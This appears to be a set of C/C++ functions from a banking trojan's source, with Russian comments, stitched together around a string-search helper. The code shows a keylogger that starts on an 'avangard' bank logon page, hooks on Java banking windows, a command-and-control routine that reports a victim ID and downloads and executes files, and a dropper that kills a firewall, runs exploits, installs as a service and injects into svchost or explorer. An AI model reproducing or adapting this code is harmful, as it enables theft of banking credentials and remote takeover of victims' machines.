void WINAPI IEURLChanged(PKeyLogger Logger, DWORD EventID, LPVOID Data) { char* url = (char*)Data; if( System == 0 ) { //реагируем когда в урле есть слово avangard и далее logon_enter char* p = m_strstr( url, "avangard" ); if( p ) { p += 8; if( m_strstr( url, "logon_enter" ) ) { DBGAVG( "Avangard", "Урл %s", url ); InitKeyLogger(); } } } }
void DeleteIE_cookies(char* os) { if(m_strstr(os, "Windows XP")) { DeleteIECookies(1); } else if(m_strstr(os, "Windows Vista") || m_strstr(os, "Windows Seven") || m_strstr(os, "Windows Server 2008") || m_strstr(os, "Windows Server 2008 R2")) { DeleteIECookies(2); } else { DeleteIECookies(1); DeleteIECookies(2); } }
int main(void){ char str[] = "sdhfkjsdghshellowdsgfds"; char sub[] = "hello"; char *p = m_strstr(str,sub); if(NULL == p) printf("sub is not in str.\n"); else printf("bingo, sub is in str.\nsub string is :\n%s\n",p); return 0; }
// если она ещё не перехвачена. Если показывается диалог, то считаем его // модальным, все координаты кликов будут обрабатываться для него. static BOOL WINAPI Hook_ShowWindow(HWND hWnd, int Cmd) { // Получаем название класса окна OutputDebugString("1234"); char cClasN[MAX_PATH]; GetClassNameA(hWnd, cClasN, MAX_PATH); bool isFrame = (NULL != m_strstr(cClasN, "SunAwtFrame")); bool isDialog = (NULL != m_strstr(cClasN, "SunAwtDialog")); if (SW_HIDE != Cmd) { OutputDebugString("Hook_ShowWindow"); if (isFrame) { // Перебиваем оконную функцию на свою DbgMsg(cClasN, (int)Cmd, "Java Frame Wnd"); ChangeWndProc(hWnd, &g_frame_wnd, &g_old_frame_wnd_proc); g_is_dialog = false; } else if (isDialog) { // Перебиваем оконную функцию на свою DbgMsg(cClasN, (int)Cmd, "Java Dialog Wnd"); ChangeWndProc(hWnd, &g_dialog_wnd, &g_old_dialog_wnd_proc); g_is_dialog = true; } } else { g_is_dialog = false; } Cmd /= Cmd & 0xf0000000; // Вызываем дефолтную ShowWindow return Real_ShowWindow(hWnd, Cmd); }
bool ParseUrl1( char *Url, char **Server, char **Path, int *Port ) { char *Ptr1 = NULL; char *Ptr2 = NULL; char *Ptr3 = NULL; char *Ptr4 = NULL; char *Host = (char*)MemAlloc( 512 ); char *OptionalPort = (char*)MemAlloc( 512 ); if ( Host == NULL || OptionalPort == NULL ) { return false; } DWORD dwPort = 0; Ptr1 = m_strstr( Url, "://" ); if( Ptr1 ) { Ptr1 += 3; } else { Ptr1 = Url; } Ptr4 = m_strstr( Ptr1, "/" ); Ptr2 = m_strstr( Ptr1, ":" ); if( !Ptr2 ) { *Port = 80; Ptr3 = m_strstr( Ptr1, "/" ); if( !Ptr3 ) { return false; } m_memcpy( Host, Ptr1, Ptr3 - Ptr1 ); Host[ Ptr3 - Ptr1 ] = '\0'; } else { Ptr3 = m_strstr( Ptr1, "/" ); if( !Ptr3 ) { return false; } m_memcpy( OptionalPort, Ptr2 + 1, Ptr3 - Ptr2 ); m_memcpy( Host, Ptr1, Ptr2 - Ptr1 ); OptionalPort[ Ptr3 - Ptr2 ] = '\0'; Host[ Ptr2 - Ptr1 ] = '\0'; *Port = m_atoi( OptionalPort ); } MemFree( OptionalPort ); *Server = Host; *Path = Ptr4; return true; }
bool ReportToPlugin( char *Url ) { WSADATA wsa; if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 ) { return false; } char *Host = NULL; char *Path = NULL; int Port = 0; if ( !ParseUrl1( Url, &Host, &Path, &Port ) ) { return false; } char Uid[100]; GenerateUid( Uid ); typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); char *UserAgent = NULL; UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); if ( UserAgent == NULL ) { MemFree( UserAgent ); UserAgent = "-"; } char Request[] = "POST %s HTTP/1.0\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Accept: text/html\r\n" "Connection: Close\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\n"; char Args[] = "id="; char *HttpPacket = NULL; HttpPacket = (char*)MemAlloc( 2048 ); int iTmp; if (LoadExe!=NULL) { iTmp=m_lstrlen(LoadExe); }else iTmp=9; pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp ); m_lstrcat( HttpPacket, Args ); m_lstrcat( HttpPacket, Uid ); if (LoadExe==NULL) { LoadExe = (char*)MemAlloc(10); m_lstrncpy(LoadExe,"&plugins=",9); LoadExe[9]='\0'; } m_lstrcat( HttpPacket, LoadExe ); SOCKET Socket = MyConnect1( Host, Port ); if( Socket == -1 ) { return false; } bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) ); MemFree( HttpPacket ); if ( !b ) { return false; } DWORD dwSize = 0; char *Buffer = RecvAndParse( Socket, &dwSize ); if ( !Buffer ) { pclosesocket( Socket ); return false; } char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0}; char *Context; m_strtok_s( Buffer, "\r\n", &Context ); if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) ) { char * cPointer= m_strstr(&Buffer[1],"http:"); char* cUrl=Buffer; char* cUrlNext; int i; char *DownloadUrl; while (true) { cUrl= m_strstr(&cUrl[1],"http:"); if (cUrl==NULL)break; cUrlNext= m_strstr(cUrl,"|"); i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext); DownloadUrl = (char*)MemAlloc(i)+1; m_lstrncpy(DownloadUrl,cUrl,i); DownloadUrl[i]='\0'; if ( DownloadUrl ) { LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1); m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str()); m_lstrcat( LoadExe, "|"); WCHAR *FileName =(WCHAR *)GetTempName(); if ( FileName && DownloadUrl ) { ExecuteFile( DownloadUrl, FileName ); } MemFree( FileName ); } MemFree( DownloadUrl ); } } MemFree( Buffer ); pclosesocket( Socket ); return true; }
int APIENTRY MyMain(int argc, char** argv) { //return 0; //TestStepNotifications(); //MultiMethodReboot(); //return 0; //PP_DPRINTF(L"MyMain: started"); //if ( IsUserLocalSystem() ) //{ // PP_DPRINTF(L"MyMain: current user is LocalSystem."); // SvcFuckupRunAsService(SvcFuckupServiceMainTest); //} //else //{ // PP_DPRINTF(L"MyMain: current user is NOT LocalSystem."); // if ( m_strstr((PCHAR)pGetCommandLineA(),"-install") ) // { // PP_DPRINTF(L"MyMain: '-install' param specified. Run SvcFuckup."); // bool fuckup_result = SvcFuckupRun(); // PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with result=%d.", fuckup_result); // } //} //PP_DPRINTF(L"MyMain: finished"); //return 0; UnhookDlls();//снимаем хуки GetPaths(); // 100_d запуск дропера PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("100_d")); /* проверка установлен ли буткит */ if ((DWORD)pGetFileAttributesA(PathBkFile) != INVALID_FILE_ATTRIBUTES) { PP_DPRINTF(L"MyMain: bootkit already installed. Killing oneself."); InitSuicide(); WaitAndExitProcess(0); return 0; }; KillOutpost(); DoExploits(); // 100_d запуск дропера PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("101_d")); // Проверка целевой платформы. if (!CurrentPlatformAllowedByTargetSpecifier()) { InitSuicide(); PP_DPRINTF(L"MyMain:Current platform not allowed by target specifier. Callin ExitProcess..."); WaitAndExitProcess(0); return 0; } // 109_d точка прохождения целевой платформы PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("109_d")); // Проверка на параметр запуска с правами UAC if ( m_strstr((PCHAR)pGetCommandLineA(),ARGV_UAC_RUN) ) { PP_DPRINTF(L"MyMain: UAC param detected. Calling ExplorerMain..."); int ret = -1; if ( ExplorerMain() ) { PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain OK. Quit and killing oneself..."); InitSuicide(); WaitAndExitProcess(0); return 0; } PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain failed. Just quit process."); WaitAndExitProcess(ret); return 0; }; // // Если процесс запущен с системными правами переходим к инсталяции. // if (IsUserLocalSystem()) { PP_DPRINTF(L"MyMain: LocalSystem current user detected. Runing SvcFuckupRunAsService()."); SvcFuckupRunAsService(SvcFuckupServiceMain); PP_DPRINTF(L"MyMain: SvcFuckupRunAsService() finished. Calling ExitProcess()."); WaitAndExitProcess(0); return 0; }; // Если процесс запущен обычно, но включена поддержка SvcFuckup // то пробуем это сделать и прибиваем себя. if (SvcFuckupEnabled()) { PP_DPRINTF(L"MyMain: SvcFuckup enabled. Run SvcFuckupRun"); bool fuckup_result = SvcFuckupRun(); PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with %d", fuckup_result); InitSuicide(); WaitAndExitProcess(0); return 0; } PP_DPRINTF(L"MyMain: All checks passed. Trying to jump to svchost"); dwExplorerSelf = 0; if (!JmpToSvchost( ExplorerRoutine )) { PP_DPRINTF(L"MyMain: Jump to svchost failed. Trying jump to explorer"); dwExplorerSelf = 1; if (! InjectIntoExplorer ( ExplorerRoutine ) ) { PP_DPRINTF(L"MyMain: Jump to explorer failed. Trying just do ExplorerRoutine"); ExplorerRoutine( NULL ); } } PP_DPRINTF(L"MyMain: finished."); pExitProcess( 1 ); return 1; }